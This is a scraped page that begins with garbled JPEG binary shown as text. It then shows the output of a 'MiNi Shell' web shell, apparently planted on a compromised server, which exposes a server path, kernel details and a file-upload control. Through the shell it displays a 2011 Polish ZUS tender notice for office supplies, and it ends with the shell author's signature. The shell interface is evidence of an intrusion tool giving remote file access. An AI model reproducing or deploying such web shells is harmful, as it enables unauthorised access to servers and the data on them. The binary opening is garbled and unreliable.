JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110530/133544-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów piśmiennych, składanki komputerowej i wiązanych teczek kartonowych dla III Oddziału Zakładu Ubezpieczeń Społecznych w Warszawie</b><br>
<b>Numer ogłoszenia: 133544 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych III Oddział w Warszawie , ul. Senatorska 6/8, 00-917 Warszawa, woj. mazowieckie, tel. 022 8319194/95, faks 022 5382549.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów piśmiennych, składanki komputerowej i wiązanych teczek kartonowych dla III Oddziału Zakładu Ubezpieczeń Społecznych w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów piśmiennych, składanki komputerowej i wiązanych teczek kartonowych dla III Oddziału Zakładu Ubezpieczeń Społecznych w Warszawie 
1 Bloczki samoprzylepne 76 mm x 76 mm, szt. 700
2 Bloczki samoprzylepne  38 mm x 51 mm, szt. 400
3 Datownik dzień, miesiąc, rok, szt. 250
4 Pióro kulkowe, kolor wkładu niebieski, szt. 30
5 Długopis na sprężynce z wymiennym wkładem,	szt. 150
6 Długopis automatyczny, szt. 1200
7 Dziurkacz metalowy, duży, dziurkujący min. 40 kartek, szt. 25
8 Dziurkacz z metalową podstawą, szt. 120
9 Gumka do ścierania, szt. 200
10 Gumka recepturka: 100 mm x 3,0 x 4,0, op. 20
11 Gumka recepturka: 40 mm x 3,0 x 1,5, op. 20
12 Gumka recepturka: 80 mm x 1,5 x 6,0, op. 20
13 Gumka recepturka: 70 mm x 3,0 x 1,5, op. 20
14 Kalka maszynowa A-4, kolor czarny, op. 20
15 Klej w sztyfcie,	szt. 1300
16 Korektor nylonowy, szt. 50
17 Koszulki przezroczyste, groszkowe do segregatorów format A-4, op. 1000
18 Koszulki przezroczyste, groszkowe do segregatorów format A-5,	op. 100
19 Nożyczki, szt. 160
20 Maczałka glicerynowa, szt. 60
21 Linijka o długości 30 cm, szt. 50
22 Flamastry biurowe, zaokrąglona końcówka, kolor czarny, szt. 1800
23 Flamastry biurowe, zaokrąglona końcówka, kolor czerwony, szt. 500
24 Flamastry biurowe, zaokrąglona końcówka, kolor niebieski, szt. 800
25 Marker - ścięta końcówka, kolor czarny, szt.	200
26 Marker olejowy okrągła końcówka, kolor czarny, szt. 20
27 Marker olejowy okrągła końcówka, kolor srebrny, szt. 5
28 Obwoluta foliowa na dokumenty A-4, szt. 1500
29 Ołówek wykonany z żywicy syntetycznej, szt. 1500
30 Półka na dokumenty, format A4, szt. 50
31 Przekładki z kolorowego plastiku w pięciu kolorach, kpl.	200
32 Rozszywacz, szt. 100
33 Segregator A-4, szerokość  7 - 7,5 cm, (biało-czarny typu marmurek), szt. 800
34 Segregator A-4, szerokość  7 - 7,5 cm, szt.	950
35 Segregator A-4, szerokość  5 cm, szt. 250
36 Segregator A-5, szerokość  7 - 7,5 cm, szt.	100
37 Skoroszyt  A-4, plastikowy, z wąsem, szt. 2000
38 Skoroszyt  A-4, tekturowy, kolor biały, szt. 500
39 Skoroszyt plastikowy A-4, z wąsem, boczna perforacja umożliwiająca  zawieszanie w segregator, szt. 1000
40 Skorowidz alfabetyczny, format A-4, szt. 150
41 Skorowidz alfabetyczny, format A-5, szt. 100
42 Spinacze metalowe, krzyżowe, duże, wysokość  41mm, op. 150
43 Spinacze plikowe, duże, metalowe, op. 150
44 Spinacze biurowe, metalowe, okrągłe, op. 800
45 Klipy do papieru wykonane z metalu 19 mm, op. 110
46 Klipy do papieru wykonane z metalu 25 mm, op. 110
47 Klipy do papieru wykonane z metalu 32 mm, op. 110
48 Klipy do papieru wykonane z metalu 41 mm, op. 90
49 Taśma barwiąca, czerwono-czarna do maszyn liczących  Casio, Canon, szt. 200
50 Taśma Casio, papierowa offsetowa, szt. 300
51 Taśma Elka, papierowa offsetowa, szt. 2000
52 Taśma klejąca, z folii z PP, szt. 400
53 Taśma klejąca, papierowa, na klej wodny, szt. 120
54 Taśma biurowa,	szt. 1200
55 Teczka do podpisu, format A-4, szt. 50
56 Teczka ofertówka A-4, szt. 80
57 Teczka wiązana A-4, plastikowa, szt. 1500
58 Teczka na dokumenty zamykana na gumkę, format A-4, szt. 1500
59 Teczka kopertowa A4, szt. 20
60 Teczka wiązana kartonowa, format  A-4 (opak.= 50 szt.), op. 1800
61 Temperówka  metalowa pojedyncza, szt. 200
62 Tusz do stempli gumowych i polimerowych, kolor czarny, szt. 500
63 Tusz do stempli gumowych i polimerowych, kolor niebieski, szt. 50
64 Tusz do stempli gumowych i polimerowych, kolor czerwony, szt.	50
65 Wąsy metalowe (przewleczki), op. 700
66 Wąsy z plastikowymi podkładkami do skoroszytów, op.	250
67 Wkład cienki do długopisu, kolor niebieski, pasujący do długopisu z pozycji 5, szt. 200
68 Wkład  do długopisu, kolor niebieski, pasujący do długopisu z pozycji 4,            szt. 150
69 Wkład  metalowy, kolor niebieski, pasujący do długopisu z pozycji 6,	     szt. 2000
70 Zakreślacz fluorescencyjny, kolor różowy, szt. 500
71 Zakreślacz fluorescencyjny, kolor pomarańczowy, szt.	500
72 Zakreślacz fluorescencyjny, kolor zółty, szt.	500
73 Brulion A-4, twarda oprawa, szt. 650
74 Zeszyt, twarda okładka, format A-5, w kratkę, szt. 800
75 Zszywacz: metalowa konstrukcja, na zszywki 24/6, 26/6, szt. 200
76 Zszywki metalowe 24/6 (opakowanie 1 000 szt.), op. 1500
77 Duży zszywacz biurowy, na zszywki 23-10, szt.	20
78 Zszywki metalowe 23-10 (opakowanie 1 000 sztuk), op. 200
79 Zszywacz mini, zszywa do 10 kartek, szt. 10
80 Papier termoczuły do faksów 210 mm  dł. 30 m, szt. 800
81 Torebki wykonane z przezroczystej  folii, op.	250
82 Zszywki nr 10, do zszywacza mini, op. 30
83 Składanka komputerowa 210 x 12 ( 1+0) biała z obustronną perforacją, op. 100.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.93.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości 2 400,00 zł (słownie: dwa tysiące czterysta złotych, 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek,  jeżeli będzie to wynikało z oświadczenia o którym mowa w art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek,  jeżeli będzie to wynikało z oświadczenia o którym mowa w art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek,  jeżeli będzie to wynikało z oświadczenia o którym mowa w art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek,  jeżeli będzie to wynikało z oświadczenia o którym mowa w art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek,  jeżeli będzie to wynikało z oświadczenia o którym mowa w art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych III Oddział w Warszawie, 00-917 Warszawa, ul. Senatorska 6/8 (wejście od ul. Senatorskiej 10), pok. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2011 godzina 10:30, miejsce: Zakład Ubezpieczeń Społecznych III Oddział w Warszawie, 00-917 Warszawa, ul. Senatorska 6/8 (wejście od ul. Senatorskiej 10), pok. 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com